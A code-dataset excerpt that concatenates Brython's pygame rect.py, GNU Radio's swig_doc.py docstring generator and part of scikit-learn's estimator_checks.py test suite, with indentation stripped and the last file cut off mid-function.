from . msg_loader import MsgNotFound, MsgContext, load_depends, load_msg_by_type, load_srv_by_type
from . srvs import SrvSpec
|
40223136/w11-2
|
refs/heads/master
|
static/Brython3.1.0-20150301-090019/Lib/site-packages/pygame/rect.py
|
603
|
#!/usr/bin/env python
'''Pygame object for storing rectangular coordinates.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import copy
#import SDL.video
import SDL
class _RectProxy:
'''Proxy for SDL_Rect that can handle negative size.'''
__slots__ = ['x', 'y', 'w', 'h']
def __init__(self, r):
if isinstance(r, SDL.SDL_Rect) or isinstance(r, Rect):
self.x = r.x
self.y = r.y
self.w = r.w
self.h = r.h
else:
self.x = r[0]
self.y = r[1]
self.w = r[2]
self.h = r[3]
def _get_as_parameter_(self):
return SDL.SDL_Rect(self.x, self.y, self.w, self.h)
_as_parameter_ = property(_get_as_parameter_)
class Rect:
__slots__ = ['_r']
def __init__(self, *args):
if len(args) == 1:
arg = args[0]
if isinstance(arg, Rect):
object.__setattr__(self, '_r', copy.copy(arg._r))
return
elif isinstance(arg, SDL.SDL_Rect):
object.__setattr__(self, '_r', copy.copy(arg))
return
elif hasattr(arg, 'rect'):
arg = arg.rect
if callable(arg):
arg = arg()
self.__init__(arg)
return
elif hasattr(arg, '__len__'):
args = arg
else:
raise TypeError('Argument must be rect style object')
if len(args) == 4:
if args[2] < 0 or args[3] < 0:
object.__setattr__(self, '_r', _RectProxy((int(args[0]),
int(args[1]),
int(args[2]),
int(args[3]))))
else:
object.__setattr__(self, '_r', SDL.SDL_Rect(int(args[0]),
int(args[1]),
int(args[2]),
int(args[3])))
elif len(args) == 2:
if args[1][0] < 0 or args[1][1] < 0:
object.__setattr__(self, '_r',
_RectProxy((int(args[0][0]),
int(args[0][1]),
int(args[1][0]),
int(args[1][1]))))
else:
object.__setattr__(self, '_r',
SDL.SDL_Rect(int(args[0][0]),
int(args[0][1]),
int(args[1][0]),
int(args[1][1])))
else:
raise TypeError('Argument must be rect style object')
def __copy__(self):
return Rect(self)
def __repr__(self):
return '<rect(%d, %d, %d, %d)>' % \
(self._r.x, self._r.y, self._r.w, self._r.h)
def __cmp__(self, *other):
other = _rect_from_object(other)
if self._r.x != other._r.x:
return cmp(self._r.x, other._r.x)
if self._r.y != other._r.y:
return cmp(self._r.y, other._r.y)
if self._r.w != other._r.w:
return cmp(self._r.w, other._r.w)
if self._r.h != other._r.h:
return cmp(self._r.h, other._r.h)
return 0
def __nonzero__(self):
return self._r.w != 0 and self._r.h != 0
def __getattr__(self, name):
if name == 'top':
return self._r.y
elif name == 'left':
return self._r.x
elif name == 'bottom':
return self._r.y + self._r.h
elif name == 'right':
return self._r.x + self._r.w
elif name == 'topleft':
return self._r.x, self._r.y
elif name == 'bottomleft':
return self._r.x, self._r.y + self._r.h
elif name == 'topright':
return self._r.x + self._r.w, self._r.y
elif name == 'bottomright':
return self._r.x + self._r.w, self._r.y + self._r.h
elif name == 'midtop':
return self._r.x + self._r.w / 2, self._r.y
elif name == 'midleft':
return self._r.x, self._r.y + self._r.h / 2
elif name == 'midbottom':
return self._r.x + self._r.w / 2, self._r.y + self._r.h
elif name == 'midright':
return self._r.x + self._r.w, self._r.y + self._r.h / 2
elif name == 'center':
return self._r.x + self._r.w / 2, self._r.y + self._r.h / 2
elif name == 'centerx':
return self._r.x + self._r.w / 2
elif name == 'centery':
return self._r.y + self._r.h / 2
elif name == 'size':
return self._r.w, self._r.h
elif name == 'width':
return self._r.w
elif name == 'height':
return self._r.h
else:
raise AttributeError(name)
def __setattr__(self, name, value):
if name == 'top' or name == 'y':
self._r.y = value
elif name == 'left' or name == 'x':
self._r.x = int(value)
elif name == 'bottom':
self._r.y = int(value) - self._r.h
elif name == 'right':
self._r.x = int(value) - self._r.w
elif name == 'topleft':
self._r.x = int(value[0])
self._r.y = int(value[1])
elif name == 'bottomleft':
self._r.x = int(value[0])
self._r.y = int(value[1]) - self._r.h
elif name == 'topright':
self._r.x = int(value[0]) - self._r.w
self._r.y = int(value[1])
elif name == 'bottomright':
self._r.x = int(value[0]) - self._r.w
self._r.y = int(value[1]) - self._r.h
elif name == 'midtop':
self._r.x = int(value[0]) - self._r.w / 2
self._r.y = int(value[1])
elif name == 'midleft':
self._r.x = int(value[0])
self._r.y = int(value[1]) - self._r.h / 2
elif name == 'midbottom':
self._r.x = int(value[0]) - self._r.w / 2
self._r.y = int(value[1]) - self._r.h
elif name == 'midright':
self._r.x = int(value[0]) - self._r.w
self._r.y = int(value[1]) - self._r.h / 2
elif name == 'center':
self._r.x = int(value[0]) - self._r.w / 2
self._r.y = int(value[1]) - self._r.h / 2
elif name == 'centerx':
self._r.x = int(value) - self._r.w / 2
elif name == 'centery':
self._r.y = int(value) - self._r.h / 2
elif name == 'size':
if int(value[0]) < 0 or int(value[1]) < 0:
self._ensure_proxy()
self._r.w, self._r.h = int(value)
elif name == 'width':
if int(value) < 0:
self._ensure_proxy()
self._r.w = int(value)
elif name == 'height':
if int(value) < 0:
self._ensure_proxy()
self._r.h = int(value)
else:
raise AttributeError(name)
def _ensure_proxy(self):
if not isinstance(self._r, _RectProxy):
object.__setattr__(self, '_r', _RectProxy(self._r))
def __len__(self):
return 4
def __getitem__(self, key):
return (self._r.x, self._r.y, self._r.w, self._r.h)[key]
def __setitem__(self, key, value):
r = [self._r.x, self._r.y, self._r.w, self._r.h]
r[key] = value
self._r.x, self._r.y, self._r.w, self._r.h = r
def __coerce__(self, *other):
try:
return self, Rect(*other)
except TypeError:
return None
def move(self, *pos):
x, y = _two_ints_from_args(pos)
return Rect(self._r.x + x, self._r.y + y, self._r.w, self._r.h)
def move_ip(self, *pos):
x, y = _two_ints_from_args(pos)
self._r.x += x
self._r.y += y
def inflate(self, x, y):
return Rect(self._r.x - x / 2, self._r.y - y / 2,
self._r.w + x, self._r.h + y)
def inflate_ip(self, x, y):
self._r.x -= x / 2
self._r.y -= y / 2
self._r.w += x
self._r.h += y
def clamp(self, *other):
r = Rect(self)
r.clamp_ip(*other)
return r
def clamp_ip(self, *other):
other = _rect_from_object(other)._r
if self._r.w >= other.w:
x = other.x + other.w / 2 - self._r.w / 2
elif self._r.x < other.x:
x = other.x
elif self._r.x + self._r.w > other.x + other.w:
x = other.x + other.w - self._r.w
else:
x = self._r.x
if self._r.h >= other.h:
y = other.y + other.h / 2 - self._r.h / 2
elif self._r.y < other.y:
y = other.y
elif self._r.y + self._r.h > other.y + other.h:
y = other.y + other.h - self._r.h
else:
y = self._r.y
self._r.x, self._r.y = x, y
def clip(self, *other):
r = Rect(self)
r.clip_ip(*other)
return r
def clip_ip(self, *other):
other = _rect_from_object(other)._r
x = max(self._r.x, other.x)
w = min(self._r.x + self._r.w, other.x + other.w) - x
y = max(self._r.y, other.y)
h = min(self._r.y + self._r.h, other.y + other.h) - y
if w <= 0 or h <= 0:
self._r.w, self._r.h = 0, 0
else:
self._r.x, self._r.y, self._r.w, self._r.h = x, y, w, h
def union(self, *other):
r = Rect(self)
r.union_ip(*other)
return r
def union_ip(self, *other):
other = _rect_from_object(other)._r
x = min(self._r.x, other.x)
y = min(self._r.y, other.y)
w = max(self._r.x + self._r.w, other.x + other.w) - x
h = max(self._r.y + self._r.h, other.y + other.h) - y
self._r.x, self._r.y, self._r.w, self._r.h = x, y, w, h
def unionall(self, others):
r = Rect(self)
r.unionall_ip(others)
return r
def unionall_ip(self, others):
l = self._r.x
r = self._r.x + self._r.w
t = self._r.y
b = self._r.y + self._r.h
for other in others:
other = _rect_from_object(other)._r
l = min(l, other.x)
r = max(r, other.x + other.w)
t = min(t, other.y)
b = max(b, other.y + other.h)
self._r.x, self._r.y, self._r.w, self._r.h = l, t, r - l, b - t
def fit(self, *other):
r = Rect(self)
r.fit_ip(*other)
return r
def fit_ip(self, *other):
other = _rect_from_object(other)._r
xratio = self._r.w / float(other.w)
yratio = self._r.h / float(other.h)
maxratio = max(xratio, yratio)
self._r.w = int(self._r.w / maxratio)
self._r.h = int(self._r.h / maxratio)
self._r.x = other.x + (other.w - self._r.w) / 2
self._r.y = other.y + (other.h - self._r.h) / 2
def normalize(self):
if self._r.w < 0:
self._r.x += self._r.w
self._r.w = -self._r.w
if self._r.h < 0:
self._r.y += self._r.h
self._r.h = -self._r.h
if isinstance(self._r, _RectProxy):
object.__setattr__(self, '_r', SDL.SDL_Rect(self._r.x,
self._r.y,
self._r.w,
self._r.h))
def contains(self, *other):
other = _rect_from_object(other)._r
return self._r.x <= other.x and \
self._r.y <= other.y and \
self._r.x + self._r.w >= other.x + other.w and \
self._r.y + self._r.h >= other.y + other.h and \
self._r.x + self._r.w > other.x and \
self._r.y + self._r.h > other.y
def collidepoint(self, x, y):
return x >= self._r.x and \
y >= self._r.y and \
x < self._r.x + self._r.w and \
y < self._r.y + self._r.h
def colliderect(self, *other):
return _rect_collide(self._r, _rect_from_object(other)._r)
def collidelist(self, others):
for i in range(len(others)):
if _rect_collide(self._r, _rect_from_object(others[i])._r):
return i
return -1
def collidelistall(self, others):
matches = []
for i in range(len(others)):
if _rect_collide(self._r, _rect_from_object(others[i])._r):
matches.append(i)
return matches
def collidedict(self, d):
for key, other in d.items():
if _rect_collide(self._r, _rect_from_object(other)._r):
return key, other
return None
def collidedictall(self, d):
matches = []
for key, other in d.items():
if _rect_collide(self._r, _rect_from_object(other)._r):
matches.append((key, other))
return matches
def _rect_from_object(obj):
if isinstance(obj, Rect):
return obj
if type(obj) in (tuple, list):
return Rect(*obj)
else:
return Rect(obj)
def _rect_collide(a, b):
return a.x + a.w > b.x and b.x + b.w > a.x and \
a.y + a.h > b.y and b.y + b.h > a.y
def _two_ints_from_args(arg):
if len(arg) == 1:
return _two_ints_from_args(arg[0])
else:
return arg[:2]
|
roeebar/gr-plc
|
refs/heads/master
|
docs/doxygen/swig_doc.py
|
220
|
#
# Copyright 2010,2011 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
"""
Creates the swig_doc.i SWIG interface file.
Execute using: python swig_doc.py xml_path outputfilename
The file instructs SWIG to transfer the doxygen comments into the
python docstrings.
"""
import sys
try:
from doxyxml import DoxyIndex, DoxyClass, DoxyFriend, DoxyFunction, DoxyFile, base
except ImportError:
from gnuradio.doxyxml import DoxyIndex, DoxyClass, DoxyFriend, DoxyFunction, DoxyFile, base
def py_name(name):
bits = name.split('_')
return '_'.join(bits[1:])
def make_name(name):
bits = name.split('_')
return bits[0] + '_make_' + '_'.join(bits[1:])
class Block(object):
"""
Checks if doxyxml produced objects correspond to a gnuradio block.
"""
@classmethod
def includes(cls, item):
if not isinstance(item, DoxyClass):
return False
# Check for a parsing error.
if item.error():
return False
return item.has_member(make_name(item.name()), DoxyFriend)
def utoascii(text):
"""
Convert unicode text into ascii and escape quotes.
"""
if text is None:
return ''
out = text.encode('ascii', 'replace')
out = out.replace('"', '\\"')
return out
def combine_descriptions(obj):
"""
Combines the brief and detailed descriptions of an object together.
"""
description = []
bd = obj.brief_description.strip()
dd = obj.detailed_description.strip()
if bd:
description.append(bd)
if dd:
description.append(dd)
return utoascii('\n\n'.join(description)).strip()
entry_templ = '%feature("docstring") {name} "{docstring}"'
def make_entry(obj, name=None, templ="{description}", description=None):
"""
Create a docstring entry for a swig interface file.
obj - a doxyxml object from which documentation will be extracted.
name - the name of the C object (defaults to obj.name())
templ - an optional template for the docstring containing only one
variable named 'description'.
description - if this optional variable is set then it's value is
used as the description instead of extracting it from obj.
"""
if name is None:
name=obj.name()
if "operator " in name:
return ''
if description is None:
description = combine_descriptions(obj)
docstring = templ.format(description=description)
if not docstring:
return ''
return entry_templ.format(
name=name,
docstring=docstring,
)
def make_func_entry(func, name=None, description=None, params=None):
"""
Create a function docstring entry for a swig interface file.
func - a doxyxml object from which documentation will be extracted.
name - the name of the C object (defaults to func.name())
description - if this optional variable is set then it's value is
used as the description instead of extracting it from func.
params - a parameter list that overrides using func.params.
"""
if params is None:
params = func.params
params = [prm.declname for prm in params]
if params:
sig = "Params: (%s)" % ", ".join(params)
else:
sig = "Params: (NONE)"
templ = "{description}\n\n" + sig
return make_entry(func, name=name, templ=utoascii(templ),
description=description)
def make_class_entry(klass, description=None):
"""
Create a class docstring for a swig interface file.
"""
output = []
output.append(make_entry(klass, description=description))
for func in klass.in_category(DoxyFunction):
name = klass.name() + '::' + func.name()
output.append(make_func_entry(func, name=name))
return "\n\n".join(output)
def make_block_entry(di, block):
"""
Create class and function docstrings of a gnuradio block for a
swig interface file.
"""
descriptions = []
# Get the documentation associated with the class.
class_desc = combine_descriptions(block)
if class_desc:
descriptions.append(class_desc)
# Get the documentation associated with the make function
make_func = di.get_member(make_name(block.name()), DoxyFunction)
make_func_desc = combine_descriptions(make_func)
if make_func_desc:
descriptions.append(make_func_desc)
# Get the documentation associated with the file
try:
block_file = di.get_member(block.name() + ".h", DoxyFile)
file_desc = combine_descriptions(block_file)
if file_desc:
descriptions.append(file_desc)
except base.Base.NoSuchMember:
# Don't worry if we can't find a matching file.
pass
# And join them all together to make a super duper description.
super_description = "\n\n".join(descriptions)
# Associate the combined description with the class and
# the make function.
output = []
output.append(make_class_entry(block, description=super_description))
creator = block.get_member(block.name(), DoxyFunction)
output.append(make_func_entry(make_func, description=super_description,
params=creator.params))
return "\n\n".join(output)
def make_swig_interface_file(di, swigdocfilename, custom_output=None):
output = ["""
/*
* This file was automatically generated using swig_doc.py.
*
* Any changes to it will be lost next time it is regenerated.
*/
"""]
if custom_output is not None:
output.append(custom_output)
# Create docstrings for the blocks.
blocks = di.in_category(Block)
make_funcs = set([])
for block in blocks:
try:
make_func = di.get_member(make_name(block.name()), DoxyFunction)
make_funcs.add(make_func.name())
output.append(make_block_entry(di, block))
except block.ParsingError:
print('Parsing error for block %s' % block.name())
# Create docstrings for functions
# Don't include the make functions since they have already been dealt with.
funcs = [f for f in di.in_category(DoxyFunction) if f.name() not in make_funcs]
for f in funcs:
try:
output.append(make_func_entry(f))
except f.ParsingError:
print('Parsing error for function %s' % f.name())
# Create docstrings for classes
block_names = [block.name() for block in blocks]
klasses = [k for k in di.in_category(DoxyClass) if k.name() not in block_names]
for k in klasses:
try:
output.append(make_class_entry(k))
except k.ParsingError:
print('Parsing error for class %s' % k.name())
# Docstrings are not created for anything that is not a function or a class.
# If this excludes anything important please add it here.
output = "\n\n".join(output)
swig_doc = file(swigdocfilename, 'w')
swig_doc.write(output)
swig_doc.close()
if __name__ == "__main__":
# Parse command line options and set up doxyxml.
err_msg = "Execute using: python swig_doc.py xml_path outputfilename"
if len(sys.argv) != 3:
raise StandardError(err_msg)
xml_path = sys.argv[1]
swigdocfilename = sys.argv[2]
di = DoxyIndex(xml_path)
# gnuradio.gr.msq_queue.insert_tail and delete_head create errors unless docstrings are defined!
# This is presumably a bug in SWIG.
#msg_q = di.get_member(u'gr_msg_queue', DoxyClass)
#insert_tail = msg_q.get_member(u'insert_tail', DoxyFunction)
#delete_head = msg_q.get_member(u'delete_head', DoxyFunction)
output = []
#output.append(make_func_entry(insert_tail, name='gr_py_msg_queue__insert_tail'))
#output.append(make_func_entry(delete_head, name='gr_py_msg_queue__delete_head'))
custom_output = "\n\n".join(output)
# Generate the docstrings interface file.
make_swig_interface_file(di, swigdocfilename, custom_output=custom_output)
|
hdmetor/scikit-learn
|
refs/heads/master
|
sklearn/utils/estimator_checks.py
|
30
|
from __future__ import print_function
import types
import warnings
import sys
import traceback
import inspect
import pickle
from copy import deepcopy
import numpy as np
from scipy import sparse
import struct
from sklearn.externals.six.moves import zip
from sklearn.externals.joblib import hash, Memory
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raises_regex
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_in
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import META_ESTIMATORS
from sklearn.utils.testing import set_random_state
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import SkipTest
from sklearn.utils.testing import ignore_warnings
from sklearn.base import (clone, ClassifierMixin, RegressorMixin,
TransformerMixin, ClusterMixin, BaseEstimator)
from sklearn.metrics import accuracy_score, adjusted_rand_score, f1_score
from sklearn.lda import LDA
from sklearn.random_projection import BaseRandomProjection
from sklearn.feature_selection import SelectKBest
from sklearn.svm.base import BaseLibSVM
from sklearn.pipeline import make_pipeline
from sklearn.utils.validation import DataConversionWarning
from sklearn.cross_validation import train_test_split
from sklearn.utils import shuffle
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import load_iris, load_boston, make_blobs
BOSTON = None
CROSS_DECOMPOSITION = ['PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD']
def _yield_non_meta_checks(name, Estimator):
yield check_estimators_dtypes
yield check_fit_score_takes_y
yield check_dtype_object
yield check_estimators_fit_returns_self
# Check that all estimator yield informative messages when
# trained on empty datasets
yield check_estimators_empty_data_messages
if name not in CROSS_DECOMPOSITION + ['SpectralEmbedding']:
# SpectralEmbedding is non-deterministic,
# see issue #4236
# cross-decomposition's "transform" returns X and Y
yield check_pipeline_consistency
if name not in ['Imputer']:
# Test that all estimators check their input for NaN's and infs
yield check_estimators_nan_inf
if name not in ['GaussianProcess']:
# FIXME!
# in particular GaussianProcess!
yield check_estimators_overwrite_params
if hasattr(Estimator, 'sparsify'):
yield check_sparsify_coefficients
yield check_estimator_sparse_data
def _yield_classifier_checks(name, Classifier):
# test classfiers can handle non-array data
yield check_classifier_data_not_an_array
# test classifiers trained on a single label always return this label
yield check_classifiers_one_label
yield check_classifiers_classes
yield check_classifiers_pickle
yield check_estimators_partial_fit_n_features
# basic consistency testing
yield check_classifiers_train
if (name not in ["MultinomialNB", "LabelPropagation", "LabelSpreading"]
# TODO some complication with -1 label
and name not in ["DecisionTreeClassifier",
"ExtraTreeClassifier"]):
# We don't raise a warning in these classifiers, as
# the column y interface is used by the forests.
# test if classifiers can cope with y.shape = (n_samples, 1)
yield check_classifiers_input_shapes
# test if NotFittedError is raised
yield check_estimators_unfitted
if 'class_weight' in Classifier().get_params().keys():
yield check_class_weight_classifiers
def _yield_regressor_checks(name, Regressor):
# TODO: test with intercept
# TODO: test with multiple responses
# basic testing
yield check_regressors_train
yield check_regressor_data_not_an_array
yield check_estimators_partial_fit_n_features
yield check_regressors_no_decision_function
# Test that estimators can be pickled, and once pickled
# give the same answer as before.
yield check_regressors_pickle
if name != 'CCA':
# check that the regressor handles int input
yield check_regressors_int
# Test if NotFittedError is raised
yield check_estimators_unfitted
def _yield_transformer_checks(name, Transformer):
# All transformers should either deal with sparse data or raise an
# exception with type TypeError and an intelligible error message
yield check_transformer_pickle
if name not in ['AdditiveChi2Sampler', 'Binarizer', 'Normalizer',
'PLSCanonical', 'PLSRegression', 'CCA', 'PLSSVD']:
yield check_transformer_data_not_an_array
# these don't actually fit the data, so don't raise errors
if name not in ['AdditiveChi2Sampler', 'Binarizer', 'Normalizer']:
# basic tests
yield check_transformer_general
yield check_transformers_unfitted
def _yield_clustering_checks(name, Clusterer):
yield check_clusterer_compute_labels_predict
if name not in ('WardAgglomeration', "FeatureAgglomeration"):
# this is clustering on the features
# let's not test that here.
yield check_clustering
yield check_estimators_partial_fit_n_features
def _yield_all_checks(name, Estimator):
for check in _yield_non_meta_checks(name, Estimator):
yield check
if issubclass(Estimator, ClassifierMixin):
for check in _yield_classifier_checks(name, Estimator):
yield check
if issubclass(Estimator, RegressorMixin):
for check in _yield_regressor_checks(name, Estimator):
yield check
if issubclass(Estimator, TransformerMixin):
for check in _yield_transformer_checks(name, Estimator):
yield check
if issubclass(Estimator, ClusterMixin):
for check in _yield_clustering_checks(name, Estimator):
yield check
def check_estimator(Estimator):
"""Check if estimator adheres to sklearn conventions.
This estimator will run an extensive test-suite for input validation,
shapes, etc.
Additional tests for classifiers, regressors, clustering or transformers
will be run if the Estimator class inherits from the corresponding mixin
from sklearn.base.
Parameters
----------
Estimator : class
Class to check.
"""
name = Estimator.__class__.__name__
check_parameters_default_constructible(name, Estimator)
for check in _yield_all_checks(name, Estimator):
check(name, Estimator)
def _boston_subset(n_samples=200):
global BOSTON
if BOSTON is None:
boston = load_boston()
X, y = boston.data, boston.target
X, y = shuffle(X, y, random_state=0)
X, y = X[:n_samples], y[:n_samples]
X = StandardScaler().fit_transform(X)
BOSTON = X, y
return BOSTON
def set_fast_parameters(estimator):
# speed up some estimators
params = estimator.get_params()
if ("n_iter" in params
and estimator.__class__.__name__ != "TSNE"):
estimator.set_params(n_iter=5)
if "max_iter" in params:
# NMF
if estimator.max_iter is not None:
estimator.set_params(max_iter=min(5, estimator.max_iter))
# LinearSVR
if estimator.__class__.__name__ == 'LinearSVR':
estimator.set_params(max_iter=20)
if "n_resampling" in params:
# randomized lasso
estimator.set_params(n_resampling=5)
if "n_estimators" in params:
# especially gradient boosting with default 100
estimator.set_params(n_estimators=min(5, estimator.n_estimators))
if "max_trials" in params:
# RANSAC
estimator.set_params(max_trials=10)
if "n_init" in params:
# K-Means
estimator.set_params(n_init=2)
if estimator.__class__.__name__ == "SelectFdr":
# be tolerant of noisy datasets (not actually speed)
estimator.set_params(alpha=.5)
if estimator.__class__.__name__ == "TheilSenRegressor":
estimator.max_subpopulation = 100
if isinstance(estimator, BaseRandomProjection):
# Due to the jl lemma and often very few samples, the number
# of components of the random matrix projection will be probably
# greater than the number of features.
# So we impose a smaller number (avoid "auto" mode)
estimator.set_params(n_components=1)
if isinstance(estimator, SelectKBest):
# SelectKBest has a default of k=10
# which is more feature than we have in most case.
estimator.set_params(k=1)
class NotAnArray(object):
" An object that is convertable to an array"
def __init__(self, data):
self.data = data
def __array__(self, dtype=None):
return self.data
def _is_32bit():
"""Detect if process is 32bit Python."""
return struct.calcsize('P') * 8 == 32
def check_estimator_sparse_data(name, Estimator):
rng = np.random.RandomState(0)
X = rng.rand(40, 10)
X[X < .8] = 0
X = sparse.csr_matrix(X)
y = (4 * rng.rand(40)).astype(np.int)
# catch deprecation warnings
with warnings.catch_warnings():
if name in ['Scaler', 'StandardScaler']:
estimator = Estimator(with_mean=False)
else:
estimator = Estimator()
set_fast_parameters(estimator)
# fit and predict
try:
estimator.fit(X, y)
if hasattr(estimator, "predict"):
estimator.predict(X)
if hasattr(estimator, 'predict_proba'):
estimator.predict_proba(X)
except TypeError as e:
if 'sparse' not in repr(e):
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: error message state explicitly that "
"sparse input is not supported if this is not the case."
% name)
raise
except Exception:
print("Estimator %s doesn't seem to fail gracefully on "
"sparse data: it should raise a TypeError if sparse input "
"is explicitly not supported." % name)
raise
def check_dtype_object(name, Estimator):
# check that estimators treat dtype object as numeric if possible
rng = np.random.RandomState(0)
X = rng.rand(40, 10).astype(object)
y = (X[:, 0] * 4).astype(np.int)
y = multioutput_estimator_convert_y_2d(name, y)
with warnings.catch_warnings():
estimator = Estimator()
set_fast_parameters(estimator)
estimator.fit(X, y)
if hasattr(estimator, "predict"):
estimator.predict(X)
if hasattr(estimator, "transform"):
estimator.transform(X)
try:
estimator.fit(X, y.astype(object))
except Exception as e:
if "Unknown label type" not in str(e):
raise
X[0, 0] = {'foo': 'bar'}
msg = "argument must be a string or a number"
assert_raises_regex(TypeError, msg, estimator.fit, X, y)
def check_transformer_general(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
X -= X.min()
_check_transformer(name, Transformer, X, y)
_check_transformer(name, Transformer, X.tolist(), y.tolist())
def check_transformer_data_not_an_array(name, Transformer):
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X = StandardScaler().fit_transform(X)
# We need to make sure that we have non negative data, for things
# like NMF
X -= X.min() - .1
this_X = NotAnArray(X)
this_y = NotAnArray(np.asarray(y))
_check_transformer(name, Transformer, this_X, this_y)
def check_transformers_unfitted(name, Transformer):
X, y = _boston_subset()
with warnings.catch_warnings(record=True):
transformer = Transformer()
assert_raises((AttributeError, ValueError), transformer.transform, X)
def _check_transformer(name, Transformer, X, y):
if name in ('CCA', 'LocallyLinearEmbedding', 'KernelPCA') and _is_32bit():
# Those transformers yield non-deterministic output when executed on
# a 32bit Python. The same transformers are stable on 64bit Python.
# FIXME: try to isolate a minimalistic reproduction case only depending
# on numpy & scipy and/or maybe generate a test dataset that does not
# cause such unstable behaviors.
msg = name + ' is non deterministic on 32bit Python'
raise SkipTest(msg)
n_samples, n_features = np.asarray(X).shape
# catch deprecation warnings
with warnings.catch_warnings(record=True):
transformer = Transformer()
set_random_state(transformer)
set_fast_parameters(transformer)
# fit
if name in CROSS_DECOMPOSITION:
y_ = np.c_[y, y]
y_[::2, 1] *= 2
else:
y_ = y
transformer.fit(X, y_)
X_pred = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple):
for x_pred in X_pred:
assert_equal(x_pred.shape[0], n_samples)
else:
assert_equal(X_pred.shape[0], n_samples)
if hasattr(transformer, 'transform'):
if name in CROSS_DECOMPOSITION:
X_pred2 = transformer.transform(X, y_)
X_pred3 = transformer.fit_transform(X, y=y_)
else:
X_pred2 = transformer.transform(X)
X_pred3 = transformer.fit_transform(X, y=y_)
if isinstance(X_pred, tuple) and isinstance(X_pred2, tuple):
for x_pred, x_pred2, x_pred3 in zip(X_pred, X_pred2, X_pred3):
assert_array_almost_equal(
x_pred, x_pred2, 2,
"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
x_pred, x_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
else:
assert_array_almost_equal(
X_pred, X_pred2, 2,
"fit_transform and transform outcomes not consistent in %s"
% Transformer)
assert_array_almost_equal(
X_pred, X_pred3, 2,
"consecutive fit_transform outcomes not consistent in %s"
% Transformer)
# raises error on malformed input for transform
if hasattr(X, 'T'):
# If it's not an array, it does not have a 'T' property
assert_raises(ValueError, transformer.transform, X.T)
@ignore_warnings
def check_pipeline_consistency(name, Estimator):
if name in ('CCA', 'LocallyLinearEmbedding', 'KernelPCA') and _is_32bit():
# Those transformers yield non-deterministic output when executed on
# a 32bit Python. The same transformers are stable on 64bit Python.
# FIXME: try to isolate a minimalistic reproduction case only depending
# scipy and/or maybe generate a test dataset that does not
# cause such unstable behaviors.
msg = name + ' is non deterministic on 32bit Python'
raise SkipTest(msg)
# check that make_pipeline(est) gives same score as est
X, y = make_blobs(n_samples=30, centers=[[0, 0, 0], [1, 1, 1]],
random_state=0, n_features=2, cluster_std=0.1)
X -= X.min()
y = multioutput_estimator_convert_y_2d(name, y)
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
pipeline = make_pipeline(estimator)
estimator.fit(X, y)
pipeline.fit(X, y)
funcs = ["score", "fit_transform"]
for func_name in funcs:
func = getattr(estimator, func_name, None)
if func is not None:
func_pipeline = getattr(pipeline, func_name)
result = func(X, y)
result_pipe = func_pipeline(X, y)
assert_array_almost_equal(result, result_pipe)
@ignore_warnings
def check_fit_score_takes_y(name, Estimator):
# check that all estimators accept an optional y
# in fit and score so they can be used in pipelines
rnd = np.random.RandomState(0)
X = rnd.uniform(size=(10, 3))
y = np.arange(10) % 3
y = multioutput_estimator_convert_y_2d(name, y)
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator)
funcs = ["fit", "score", "partial_fit", "fit_predict", "fit_transform"]
for func_name in funcs:
func = getattr(estimator, func_name, None)
if func is not None:
func(X, y)
args = inspect.getargspec(func).args
assert_true(args[2] in ["y", "Y"])
@ignore_warnings
def check_estimators_dtypes(name, Estimator):
rnd = np.random.RandomState(0)
X_train_32 = 3 * rnd.uniform(size=(20, 5)).astype(np.float32)
X_train_64 = X_train_32.astype(np.float64)
X_train_int_64 = X_train_32.astype(np.int64)
X_train_int_32 = X_train_32.astype(np.int32)
y = X_train_int_64[:, 0]
y = multioutput_estimator_convert_y_2d(name, y)
for X_train in [X_train_32, X_train_64, X_train_int_64, X_train_int_32]:
with warnings.catch_warnings(record=True):
estimator = Estimator()
set_fast_parameters(estimator)
set_random_state(estimator, 1)
estimator.fit(X_train, y)
for method in ["predict", "transform", "decision_function",
"predict_proba"]:
if hasattr(estimator, method):
getattr(estimator, method)(X_train)
def check_estimators_empty_data_messages(name, Estimator):
e = Estimator()
set_fast_parameters(e)
set_random_state(e, 1)
X_zero_samples = np.empty(0).reshape(0, 3)
# The precise message can change depending on whether X or y is
# validated first. Let us test the type of exception only:
assert_raises(ValueError, e.fit, X_zero_samples, [])
X_zero_features = np.empty(0).reshape(3, 0)
# the following y should be accepted by both classifiers and regressors
# and ignored by unsupervised models
y = multioutput_estimator_convert_y_2d(name, np.array([1, 0, 1]))
msg = "0 feature(s) (shape=(3, 0)) while a minimum of 1 is required."
assert_raise_message(ValueError, msg, e.fit, X_zero_features, y)
def check_estimators_nan_inf(name, Estimator):
rnd = np.random.RandomState(0)
X_train_finite = rnd.uniform(size=(10, 3))
X_train_nan = rnd.uniform(size=(10, 3))
X_train_nan[0, 0] = np.nan
X_train_inf = rnd.uniform(size=(10, 3))
